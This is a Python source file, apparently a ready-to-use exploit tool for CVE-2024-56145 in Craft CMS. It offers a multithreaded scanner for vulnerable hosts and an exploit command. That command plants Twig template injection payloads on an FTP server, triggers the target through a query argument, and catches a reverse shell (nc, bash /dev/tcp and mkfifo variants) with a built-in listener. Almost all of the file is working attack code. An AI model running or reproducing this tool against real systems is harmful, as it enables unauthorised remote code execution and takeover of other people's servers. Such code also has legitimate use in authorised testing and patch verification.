import os
import sys
import uuid
import select
import socket
import warnings
import requests
import threading
import rich_click as click

from rich.console import Console
from alive_progress import alive_bar
from pyftpdlib.servers import FTPServer
from pyftpdlib.handlers import FTPHandler
from pyftpdlib.authorizers import DummyAuthorizer
from concurrent.futures import ThreadPoolExecutor

console = Console()

# Requests are sent with verify=False below; silence the resulting TLS warnings.
requests.packages.urllib3.disable_warnings()
warnings.filterwarnings(
    "ignore", category=RuntimeWarning, module="pyftpdlib.authorizers"
)


@click.group(context_settings=dict(help_option_names=["-h", "--help"]))
def cli():
    """
    CVE-2024-56145 Exploit Framework

    Exploits a Remote Code Execution (RCE) vulnerability in Craft CMS.

    Thanks to Assetnote for their research and findings:
    https://www.assetnote.io/resources/research/how-an-obscure-php-footgun-led-to-rce-in-craft-cms

    This tool provides commands to:
    - Check if a target is vulnerable.
    - Exploit the vulnerability using a crafted FTP server and listener.
    """


@cli.command()
@click.option("-u", "--url", required=False, help="The target URL for checking")
@click.option(
    "-f",
    "--file",
    required=False,
    type=click.Path(exists=True),
    help="File containing a list of URLs",
)
@click.option(
    "-t", "--threads", default=50, type=int, help="Number of concurrent threads"
)
@click.option(
    "-o",
    "--output",
    required=False,
    type=click.Path(),
    help="Output file to save results",
)
def check(url, file, threads, output):
    # Runs check_target() over the single --url and/or every non-blank line of
    # --file using a thread pool, optionally appending one result line per
    # target to --output.
    if not (url or file):
        console.print(
            "[bold red]You must specify either a URL or a file containing URLs.[/bold red]"
        )
        return

    targets = [url] if url else []
    if file:
        # Context manager so the URL list handle is closed deterministically.
        with open(file, "r") as url_file:
            targets.extend(line.strip() for line in url_file if line.strip())

    # The output file is optional; results are only written when it is given.
    out_file = open(output, "a") if output else None
    lock = threading.Lock()
    try:
        with alive_bar(
            len(targets), title="Checking Targets", bar="smooth", enrich_print=False
        ) as bar:

            def process_target(target):
                # The progress bar and the output file are shared across
                # worker threads, so both are updated under the lock.
                with lock:
                    bar()
                result = check_target(target)
                if out_file is not None:
                    with lock:
                        out_file.write(f"{result}\n")

            with ThreadPoolExecutor(max_workers=threads) as executor:
                # Consume the iterator so an exception raised in a worker is
                # re-raised here instead of being silently discarded.
                list(executor.map(process_target, targets))
    finally:
        if out_file is not None:
            out_file.close()


def check_target(target):
    """Probe a single target and return a ``"<target> | <STATUS>"`` line.

    Sends a GET request with a ``--configPath`` query argument pointing at a
    random nonce path. The target is reported as vulnerable when the response
    body contains both ``mkdir()`` and the nonce.

    Args:
        target: Base URL to probe.

    Returns:
        ``"<target> | VULNERABLE"``, ``"<target> | NOT VULNERABLE"``, or
        ``"<target> | ERROR"`` if the request raised.
    """
    nonce = str(uuid.uuid4())
    try:
        response = requests.get(
            f"{target}?--configPath=/{nonce}", verify=False, timeout=2
        )
        if "mkdir()" in response.text and nonce in response.text:
            console.print(f"[bold green]{target} is vulnerable![/bold green]")
            return f"{target} | VULNERABLE"
        console.print(f"[bold yellow]{target} is not vulnerable.[/bold yellow]")
        return f"{target} | NOT VULNERABLE"
    except Exception as e:
        # Per-target boundary: one failing host must not abort the whole scan.
        console.print(f"[bold red]Failed to check {target}: {e}[/bold red]")
        return f"{target} | ERROR"


@cli.command()
@click.option("-fh", "--ftp-host", default="127.0.0.1", help="The FTP server host")
@click.option("-fp", "--ftp-port", default=2121, type=int, help="The FTP server port")
@click.option("-u", "--url", required=True, help="The target URL for exploitation")
@click.option(
    "-lh", "--lhost", required=True, help="The local host for reverse shell listener"
)
@click.option(
    "-lp",
    "--lport",
    required=True,
    type=int,
    help="The local port for reverse shell listener",
)
@click.option(
    "-px",
    "--payload",
    default="bash",
    type=click.Choice(["nc", "bash", "mkfifo"]),
    help="Payload type to use",
)
def exploit(ftp_host, ftp_port, url, lhost, lport, payload):
    # Writes the template files, starts the FTP server and the listener in
    # daemon threads, then sends the triggering HTTP request from this thread.
    payload_str = generate_payload(payload, lhost, lport)
    root_dir = "./virtual"
    create_virtual_files(root_dir, payload_str)

    threading.Thread(
        target=start_ftp_server, args=(ftp_host, ftp_port, root_dir), daemon=True
    ).start()
    threading.Thread(target=start_listener, args=(lhost, lport), daemon=True).start()
    console.print("[bold green]FTP server and listener started[/bold green]")

    trigger_http_request(url, ftp_host, ftp_port)


def generate_payload(payload_type, lhost, lport):
    """Build the Twig template payload for the selected command template.

    Args:
        payload_type: One of ``"nc"``, ``"bash"`` or ``"mkfifo"``.
        lhost: Host substituted into the command template.
        lport: Port substituted into the command template.

    Returns:
        The Twig expression string that wraps the chosen command.

    Raises:
        KeyError: If ``payload_type`` is not one of the known templates.
    """
    payload_templates = {
        "nc": f"nc -e /bin/bash {lhost} {lport}",
        "bash": f'bash -c "bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"',
        "mkfifo": f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc {lhost} {lport} >/tmp/f",
    }
    payload = f"{{{{ ['system', '{payload_templates[payload_type]}'] | sort('call_user_func') }}}}"
    console.print(f"[bold yellow]Payload generated:[/bold yellow] {payload}")
    return payload


def create_virtual_files(root_dir, payload):
    """Write ``payload`` to ``default/index.twig`` and ``default/index.html``.

    Args:
        root_dir: Directory under which the ``default`` folder is created.
        payload: Text written verbatim to both files.

    Errors are reported on the console rather than raised.
    """
    try:
        os.makedirs(f"{root_dir}/default", exist_ok=True)
        with open(f"{root_dir}/default/index.twig", "w") as twig_file:
            twig_file.write(payload)
        with open(f"{root_dir}/default/index.html", "w") as html_file:
            html_file.write(payload)
        console.print("[bold green]Virtual files created successfully.[/bold green]")
    except Exception as e:
        console.print(f"[bold red]Failed to create virtual files:[/bold red] {e}")


def start_ftp_server(host, port, root_dir):
    """Serve ``root_dir`` over anonymous FTP until the server stops.

    Args:
        host: Address to bind the FTP server to.
        port: Port to bind the FTP server to.
        root_dir: Directory exposed to the anonymous user.

    Errors while creating or running the server are reported on the console
    rather than raised.
    """
    authorizer = DummyAuthorizer()
    authorizer.add_anonymous(root_dir, perm="elradfmw")
    handler = FTPHandler
    handler.authorizer = authorizer
    try:
        # Constructing the server binds the socket, so it belongs inside the
        # try block: a bind failure is then reported like any other error.
        server = FTPServer((host, port), handler)
        console.print(f"[bold green]FTP server running on {host}:{port}[/bold green]")
        server.serve_forever()
    except Exception as e:
        console.print(f"[bold red]Error starting FTP server:[/bold red] {e}")


def trigger_http_request(url, ftp_host, ftp_port):
    """Send the GET request carrying the ``--templatesPath`` argument.

    Args:
        url: Target base URL.
        ftp_host: Host used to build the ``ftp://`` templates path.
        ftp_port: Port used to build the ``ftp://`` templates path.

    The outcome is reported on the console; request errors are not raised.
    """
    templates_path = f"ftp://{ftp_host}:{ftp_port}"
    console.print(
        f"[bold yellow]Sending request to {url} with templatesPath={templates_path}[/bold yellow]"
    )
    try:
        # NOTE(review): no timeout is set here, so this call can block
        # indefinitely — confirm whether that is intentional.
        response = requests.get(f"{url}?--templatesPath={templates_path}", verify=False)
        if response.status_code == 200:
            console.print(
                "[bold green]Payload triggered successfully. Check your listener for a session.[/bold green]"
            )
        else:
            console.print(
                f"[bold red]Failed to trigger payload. HTTP Status:[/bold red] {response.status_code}"
            )
    except Exception as e:
        console.print(f"[bold red]Failed to send HTTP request:[/bold red] {e}")


def start_listener(lhost, lport, timeout=30):
    """Accept one TCP connection and relay it to and from the terminal.

    Args:
        lhost: Address to bind the listening socket to.
        lport: Port to bind the listening socket to.
        timeout: Seconds to wait for an incoming connection.

    Data received from the peer is written to stdout and lines read from
    stdin are sent to the peer. Both sockets are closed on exit, whether or
    not a connection was ever accepted.
    """
    console.print(f"[bold cyan]Starting listener on {lhost}:{lport}[/bold cyan]")
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Initialised up front so the finally block can tell whether accept()
    # ever produced a connection.
    conn = None
    try:
        s.bind((lhost, lport))
        s.listen(1)
        s.settimeout(timeout)
        console.print(
            f"[bold yellow]Waiting for connection... (Timeout: {timeout}s)[/bold yellow]"
        )
        conn, addr = s.accept()
        console.print(
            f"[bold green]Connection received from {addr[0]}:{addr[1]}[/bold green]"
        )
        conn.setblocking(0)

        while True:
            ready, _, _ = select.select([conn, sys.stdin], [], [])
            if conn in ready:
                data = conn.recv(4096).decode(errors="ignore")
                if not data:
                    # An empty read means the peer closed the connection.
                    break
                sys.stdout.write(data)
                sys.stdout.flush()
            if sys.stdin in ready:
                command = sys.stdin.readline().strip()
                conn.sendall((command + "\n").encode())
    except socket.timeout:
        console.print(
            f"[bold red]No connection received within {timeout} seconds.[/bold red]"
        )
    except KeyboardInterrupt:
        console.print("[bold cyan]\nListener stopped by user.[/bold cyan]")
    except Exception as e:
        console.print(f"[bold red]Error: {e}[/bold red]")
    finally:
        if conn is not None:
            conn.close()
        s.close()
        console.print("[bold cyan]Listener closed.[/bold cyan]")


if __name__ == "__main__":
    cli()